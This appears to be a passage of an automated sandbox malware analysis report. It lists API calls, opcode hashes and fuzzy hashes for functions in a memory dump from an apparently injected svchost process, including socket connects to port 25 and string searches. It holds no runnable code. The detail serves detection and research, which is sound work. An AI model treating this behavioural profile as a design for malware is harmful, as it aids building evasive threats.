                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CommandLineVersioninet_addr
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4064751120-0
                                                                                                                                                                                • Opcode ID: 8c29bf9a9e3164cd00cdf173d5a8084e70e7ccd357447c54fdac7d7a3ea16c70
                                                                                                                                                                                • Instruction ID: 69915f827bd4f4389c55c8526bcd49d3ee977bc70560e42c9cfe2d9561d34fc1
                                                                                                                                                                                • Opcode Fuzzy Hash: 8c29bf9a9e3164cd00cdf173d5a8084e70e7ccd357447c54fdac7d7a3ea16c70
                                                                                                                                                                                • Instruction Fuzzy Hash: 695175B9740354B7D724EBA9CC8DF9A3B29EBC2B59F14083DF105DA1C1EB74A444CA25
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • CharLowerA.USER32(?), ref: 1314E8A5
                                                                                                                                                                                • StrStrIA.SHLWAPI(?,?,-00000004,00000060,?,?,-00000004,0000005F,?,?,-00000004,0000005E,?,?,-00000004,0000005D), ref: 1314E9C5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CharLower
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1615517891-0
                                                                                                                                                                                • Opcode ID: e15f2f67250bf7c819582e290c9eaea27e66e80e3beb9cdf804c5e2b29c6ed88
                                                                                                                                                                                • Instruction ID: 419d3c6777e993e7358b4fad858bdbe2f704fa2787bc25a9698b8ab6963bd5de
                                                                                                                                                                                • Opcode Fuzzy Hash: e15f2f67250bf7c819582e290c9eaea27e66e80e3beb9cdf804c5e2b29c6ed88
                                                                                                                                                                                • Instruction Fuzzy Hash: 50518176A04605EFDB21CF98C981E9AB7B9FF08314F284029E65AD7290D731E950CB60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • IsBadReadPtr.KERNEL32(?,?), ref: 1314557A
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Read
                                                                                                                                                                                • String ID: =$=
                                                                                                                                                                                • API String ID: 946204249-2054292070
                                                                                                                                                                                • Opcode ID: 5244e7e0b95c553389fa4735fb735e2861c4cb20dc950b5edc7cab66619ebe66
                                                                                                                                                                                • Instruction ID: 6a864e4eb60f65e8c86c18864ef72554e0da29526793949d917e58acd684b193
                                                                                                                                                                                • Opcode Fuzzy Hash: 5244e7e0b95c553389fa4735fb735e2861c4cb20dc950b5edc7cab66619ebe66
                                                                                                                                                                                • Instruction Fuzzy Hash: EB41F772E04299EFDF01CFA989447EFBFB89F05204F2844A9D851E6642D374C68AC7B1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,00000000,00000000), ref: 1314AF0D
                                                                                                                                                                                • lstrcpyA.KERNEL32(00000000,00000000), ref: 1314AFCC
                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,-00000004,00000082), ref: 1314AFEE
                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,00000000), ref: 1314AFF2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrcat$lstrcpylstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2274183309-0
                                                                                                                                                                                • Opcode ID: af2b05a22181a1154fb521f424507219b8dd8e098b67af918b9410bab3b45479
                                                                                                                                                                                • Instruction ID: 984daec6d2f47008fb8d3025faa8029e27d34ef63afc459df32f1da8c8b08b8e
                                                                                                                                                                                • Opcode Fuzzy Hash: af2b05a22181a1154fb521f424507219b8dd8e098b67af918b9410bab3b45479
                                                                                                                                                                                • Instruction Fuzzy Hash: 253130B6A00319AFDB00DFA9CD909AEB7FDFF48644B56447AE545E7210E730EA418B60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,00000000,00000000,76B26490), ref: 13151248
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 13151267
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00000000,-00000004,0000004C,570000AF), ref: 131512A4
                                                                                                                                                                                • setsockopt.WS2_32(?,0000FFFF,00001006,?,00000008), ref: 13151323
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$Leave$Entersetsockopt
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2622634160-0
                                                                                                                                                                                • Opcode ID: 30c288bd5c3f10fd665bd0023e444ce18f5949a68225f77c19be9fc37cfe3db8
                                                                                                                                                                                • Instruction ID: 23073220f776133a972de4463eb0e075911ea0260f81aa9f22f346945dc2a4f5
                                                                                                                                                                                • Opcode Fuzzy Hash: 30c288bd5c3f10fd665bd0023e444ce18f5949a68225f77c19be9fc37cfe3db8
                                                                                                                                                                                • Instruction Fuzzy Hash: 793118B5A047419FC720DF5AC98194AFBF4FB09324B908A3EE5AAD7A90C770A545CF10
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • htons.WS2_32(00000019), ref: 1314BD1F
                                                                                                                                                                                • setsockopt.WS2_32(1314CF4F,0000FFFF,00001005,?,00000004), ref: 1314BD68
                                                                                                                                                                                • setsockopt.WS2_32(1314CF4F,0000FFFF,00001006,?,00000004), ref: 1314BD7B
                                                                                                                                                                                • connect.WS2_32(1314CF4F,00000002,00000010), ref: 1314BD88
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: setsockopt$connecthtons
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3400676187-0
                                                                                                                                                                                • Opcode ID: 9ad987aea45b972268fb83940f92e36ee12ce6120e2b264c15baba562822e1d4
                                                                                                                                                                                • Instruction ID: e84e74bdb04a0a8647a6cae6d0c50be21cee2977d7f6e1224aa6945bccac1f85
                                                                                                                                                                                • Opcode Fuzzy Hash: 9ad987aea45b972268fb83940f92e36ee12ce6120e2b264c15baba562822e1d4
                                                                                                                                                                                • Instruction Fuzzy Hash: 05016979A40349BBEB11DBA8CC06EEFB779AF85700F100439FA45AB1D0D7B0AA049B51
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?), ref: 1314736F
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 13147382
                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 131473AF
                                                                                                                                                                                • wsprintfA.USER32 ref: 131473D8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Time$CountFileInformationSystemTickZonewsprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3771035241-0
                                                                                                                                                                                • Opcode ID: 0addc934ec445994fa1af9f440de5eea302fbc9d82595a5cc2f4b90946519963
                                                                                                                                                                                • Instruction ID: f1f2e079070bfaddb8b205531e5151ff7775d2037d7413df33222f54baa3ce7c
                                                                                                                                                                                • Opcode Fuzzy Hash: 0addc934ec445994fa1af9f440de5eea302fbc9d82595a5cc2f4b90946519963
                                                                                                                                                                                • Instruction Fuzzy Hash: 970152B2900219AFEF18EFF4DC85DD93BADEB08258F154062F915E2154DB75E984CFA0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 13152BED: __amsg_exit.LIBCMT ref: 13152BFB
                                                                                                                                                                                • __amsg_exit.LIBCMT ref: 1315432B
                                                                                                                                                                                • __lock.LIBCMT ref: 1315433B
                                                                                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 13154358
                                                                                                                                                                                • InterlockedIncrement.KERNEL32(1315AD08), ref: 13154383
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__lock
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4129207761-0
                                                                                                                                                                                • Opcode ID: fbd2b2b42058274c9e1e40ad0aec4839c2dda945ff8203164f757b40e5767281
                                                                                                                                                                                • Instruction ID: 20be28432fdb317510c556bdc8dbfa4516dcce9ab8cffca2a6a1a2e38269f76f
                                                                                                                                                                                • Opcode Fuzzy Hash: fbd2b2b42058274c9e1e40ad0aec4839c2dda945ff8203164f757b40e5767281
                                                                                                                                                                                • Instruction Fuzzy Hash: CA018E36B41731DBDB85AF69958478D7260BF03611F484115F470B7650DB386942CBE1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLastError.KERNEL32(00000001,00000000,13152EF7,13152D98,00000001,1315294F,?,00000000,00000000,?,?,?,13152A61,?,13152F12,?), ref: 13152B78
                                                                                                                                                                                  • Part of subcall function 13152A85: TlsGetValue.KERNEL32(00000000,13152B8B,?,?,?,13152A61,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476), ref: 13152A8C
                                                                                                                                                                                  • Part of subcall function 13152A85: TlsSetValue.KERNEL32(00000000,?,?,13152A61,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?), ref: 13152AAD
                                                                                                                                                                                • __calloc_crt.LIBCMT ref: 13152B9A
                                                                                                                                                                                  • Part of subcall function 13152F45: __calloc_impl.LIBCMT ref: 13152F53
                                                                                                                                                                                  • Part of subcall function 13152F45: Sleep.KERNEL32(00000000), ref: 13152F6A
                                                                                                                                                                                  • Part of subcall function 13152A17: TlsGetValue.KERNEL32(00000000,13153CD0,1315290D,?,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?), ref: 13152A24
                                                                                                                                                                                  • Part of subcall function 13152A17: TlsGetValue.KERNEL32(FFFFFFFF,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?,?,?,131520C2,0000000E), ref: 13152A3B
                                                                                                                                                                                  • Part of subcall function 13152AB7: GetModuleHandleA.KERNEL32(KERNEL32.DLL,131569C8,0000000C,13152BC8,00000000,00000000,?,?,?,13152A61,?,13152F12,?,00000001,?,131523E7), ref: 13152AC8
                                                                                                                                                                                  • Part of subcall function 13152AB7: GetProcAddress.KERNEL32(?,EncodePointer), ref: 13152AFC
                                                                                                                                                                                  • Part of subcall function 13152AB7: GetProcAddress.KERNEL32(?,DecodePointer), ref: 13152B0C
                                                                                                                                                                                  • Part of subcall function 13152AB7: InterlockedIncrement.KERNEL32(1315AD08), ref: 13152B2E
                                                                                                                                                                                  • Part of subcall function 13152AB7: __lock.LIBCMT ref: 13152B36
                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 13152BCA
                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,?,13152A61,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?), ref: 13152BE2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Value$AddressErrorLastProc$CurrentHandleIncrementInterlockedModuleSleepThread__calloc_crt__calloc_impl__lock
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2539975944-0
                                                                                                                                                                                • Opcode ID: adb725a9134938a95b1c836ee6b1e9ea189e50f410bd80173755e6f9bbf1f5cb
                                                                                                                                                                                • Instruction ID: 3867756d27c0135bee374bf51de64289947cab669b26ec1be1cedbf1d942a3e8
                                                                                                                                                                                • Opcode Fuzzy Hash: adb725a9134938a95b1c836ee6b1e9ea189e50f410bd80173755e6f9bbf1f5cb
                                                                                                                                                                                • Instruction Fuzzy Hash: 2AF0C8376057726BD73A3B785C45BCA3B549F066B1B254529F830D71C0DF74D84286A0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • __lock.LIBCMT ref: 131524AC
                                                                                                                                                                                  • Part of subcall function 1315245D: __mtinitlocknum.LIBCMT ref: 13152471
                                                                                                                                                                                  • Part of subcall function 1315245D: __amsg_exit.LIBCMT ref: 1315247D
                                                                                                                                                                                  • Part of subcall function 1315245D: EnterCriticalSection.KERNEL32(?,?,?,131520C2,0000000E,13156928,0000000C,13151F97), ref: 13152485
                                                                                                                                                                                • ___sbh_find_block.LIBCMT ref: 131524B7
                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,13156988,0000000C,13152BDE,00000000,?,?,?,13152A61,?,13152F12,?,00000001,?,131523E7), ref: 131524F6
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,13152A61,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?), ref: 13152507
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 568605419-0
                                                                                                                                                                                • Opcode ID: e9114d0c0ff4a43fac76cc6f14c2f50f79e9beee09b5af3449e75a3f86d0cf08
                                                                                                                                                                                • Instruction ID: 97e5660a8f24ec920a53af5c230e12b3f3b18b346be0e6faeaed023650b73dfe
                                                                                                                                                                                • Opcode Fuzzy Hash: e9114d0c0ff4a43fac76cc6f14c2f50f79e9beee09b5af3449e75a3f86d0cf08
                                                                                                                                                                                • Instruction Fuzzy Hash: A701D637A04352EFDB245FB99D14BDD37A8EF03325F248029F074A7180CB34A142CA65
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(00000000,76B5EEA0,131433F1), ref: 131432DF
                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(00000000), ref: 131432F3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalInitializeSection
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 32694325-0
                                                                                                                                                                                • Opcode ID: 6d9b36f4f60a96a16bc1a5a1d74fd316fff9ecd044a6f1fb14842f02da6bf71c
                                                                                                                                                                                • Instruction ID: 6a4b42ed693ed77350d83cd620794c4273ef5989a6c03f0071cd9a173a3549bc
                                                                                                                                                                                • Opcode Fuzzy Hash: 6d9b36f4f60a96a16bc1a5a1d74fd316fff9ecd044a6f1fb14842f02da6bf71c
                                                                                                                                                                                • Instruction Fuzzy Hash: EFF054B5A443316BFF18ABFD6D95B962E9CDB05765F24443BF505D2288EF688000DAA0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?), ref: 131472EB
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 131472FE
                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 1314732B
                                                                                                                                                                                • wsprintfA.USER32 ref: 1314734E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Time$CountFileInformationSystemTickZonewsprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3771035241-0
                                                                                                                                                                                • Opcode ID: 9b8cba2e2565f2633aaa26bbdea80ebef9a999678d94bc7ba9552831924f8386
                                                                                                                                                                                • Instruction ID: 81c63a60cc059b6bfd8228d21a569bd5be14de8077915da8032e81f50a11be82
                                                                                                                                                                                • Opcode Fuzzy Hash: 9b8cba2e2565f2633aaa26bbdea80ebef9a999678d94bc7ba9552831924f8386
                                                                                                                                                                                • Instruction Fuzzy Hash: AF014FB2900219ABEB08EFF4CC85ED93B6DEB04258F114022F916E2154DB74D9848B60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 131478D7
                                                                                                                                                                                • lstrlenA.KERNEL32(?,00000079,00000078,00000077,00000076,00000072,00000073,00000075,00000074), ref: 13147991
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1659193697-0
                                                                                                                                                                                • Opcode ID: e7f9391607f021f4d8924145494e6a8032ec71588c8ab831527aa72afbe9283c
                                                                                                                                                                                • Instruction ID: 8dd164e209e03d13d7b080f773f999a28fe30cacf76840b08c0393114a442a66
                                                                                                                                                                                • Opcode Fuzzy Hash: e7f9391607f021f4d8924145494e6a8032ec71588c8ab831527aa72afbe9283c
                                                                                                                                                                                • Instruction Fuzzy Hash: F8812576A043899FDB21CF78CC90BEE3BA5AF91304F3C4069E86587242E775E546CB61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • StrStrA.SHLWAPI(?,131414A8,?,-00000004,-00000008,?,?,13145A1C,-00000004,?,?,?,?,00000000,76B7EA30), ref: 13150AC3
                                                                                                                                                                                • StrStrA.SHLWAPI(?,131414A4,?,-00000004,-00000008,?,?,13145A1C,-00000004,?,?,?,?,00000000,76B7EA30), ref: 13150ADC
                                                                                                                                                                                • CharUpperBuffA.USER32(?,00000001,?,-00000004,-00000008,?,?,13145A1C,-00000004,?,?,?,?,00000000,76B7EA30), ref: 13150AEC
                                                                                                                                                                                • CharUpperBuffA.USER32(00000001,00000001,?,-00000004,-00000008,?,?,13145A1C,-00000004,?,?,?,?,00000000,76B7EA30), ref: 13150AF6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: BuffCharUpper
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3964851224-0
                                                                                                                                                                                • Opcode ID: 57765c3c445889a43e435764364cbc31ae2d5125bd47808fc7dd29a1bfb32e86
                                                                                                                                                                                • Instruction ID: 8a890dfedadfda042d93f051d7c424d01016adc2c87a64bcc8cd4253731e0296
                                                                                                                                                                                • Opcode Fuzzy Hash: 57765c3c445889a43e435764364cbc31ae2d5125bd47808fc7dd29a1bfb32e86
                                                                                                                                                                                • Instruction Fuzzy Hash: 9F513BB5A00249EFD711DFACC980DAEBBF8FF59304B254469F895E7201D731AA50CBA0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 13144EA1: EnterCriticalSection.KERNEL32(00000000,1314E2F0,?,00000000,00000000,-00000004), ref: 13144EAC
                                                                                                                                                                                  • Part of subcall function 13144EB3: LeaveCriticalSection.KERNEL32(00000000,1314E30B,?,00000000,00000000,-00000004), ref: 13144EBE
                                                                                                                                                                                • Sleep.KERNEL32(00000001), ref: 131460EF
                                                                                                                                                                                • Sleep.KERNEL32(00000064,-00000004,0000003F,00000000), ref: 1314613E
                                                                                                                                                                                  • Part of subcall function 1315181B: EnterCriticalSection.KERNEL32(00000008,00000000,00000000,76B26490,131461CD,00000000,00000000,000000FF), ref: 13151824
                                                                                                                                                                                  • Part of subcall function 1315181B: LeaveCriticalSection.KERNEL32(00000008), ref: 13151835
                                                                                                                                                                                • Sleep.KERNEL32(00000001), ref: 131461E6
                                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 131461FF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSectionSleep$EnterLeave
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 890587828-0
                                                                                                                                                                                • Opcode ID: b3d4c390a716a34e06762df693a3c57ff7b247b2137afb7d70cd78e67ea98229
                                                                                                                                                                                • Instruction ID: 08080a18ae1c1e4bd548ce539b053228da539052a701547300ae0ece9703ad5c
                                                                                                                                                                                • Opcode Fuzzy Hash: b3d4c390a716a34e06762df693a3c57ff7b247b2137afb7d70cd78e67ea98229
                                                                                                                                                                                • Instruction Fuzzy Hash: 91312734A00320EFCB15AB68CEA1A6D7265AFC2B3DF380935F542761D5DF756581C660
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(00000008,13161EF0,00000000,00000000,00000000,?,1314CD55,?,13161EF0,131616E8), ref: 131518DE
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00000008,?,1314CD55,?), ref: 131518EB
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00000008,131616E8,?,1314CD55,?), ref: 131518FE
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00000000,131616E8,?,1314CD55,?), ref: 13151917
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2978645861-0
                                                                                                                                                                                • Opcode ID: caab4dd3995b537a3e7fe88bb2e5526481f7b060322a23dbf6b07f2b764f47e7
                                                                                                                                                                                • Instruction ID: b084411877ebf042b22e5047ccc07a2e31583f90b1ca21c5034c9ad215dd48ba
                                                                                                                                                                                • Opcode Fuzzy Hash: caab4dd3995b537a3e7fe88bb2e5526481f7b060322a23dbf6b07f2b764f47e7
                                                                                                                                                                                • Instruction Fuzzy Hash: 00216A79600245EFC709CF56C58495AB7BAFF8A325B258479E5679B311C730F881CBA0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,?,?,1314B98F,?,?), ref: 1315152A
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,1314B98F,?,?), ref: 13151538
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,1314B98F,?,?), ref: 1315154D
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,0000000C,?,?,?,1314B98F,?,?), ref: 13151587
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2978645861-0
                                                                                                                                                                                • Opcode ID: 52f5398c6f4f577c8c4e76fa03d76cbf28ba0f649fac66cf99410e3d807f1ade
                                                                                                                                                                                • Instruction ID: 3189dacb6dec9ddd2fbf7ef972df95b778389ddc3128e999783537223a99cae5
                                                                                                                                                                                • Opcode Fuzzy Hash: 52f5398c6f4f577c8c4e76fa03d76cbf28ba0f649fac66cf99410e3d807f1ade
                                                                                                                                                                                • Instruction Fuzzy Hash: 59012D356143619FCB229F6ACDC8816B7E9AF4B6607094939F597D3211C730E844CB61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%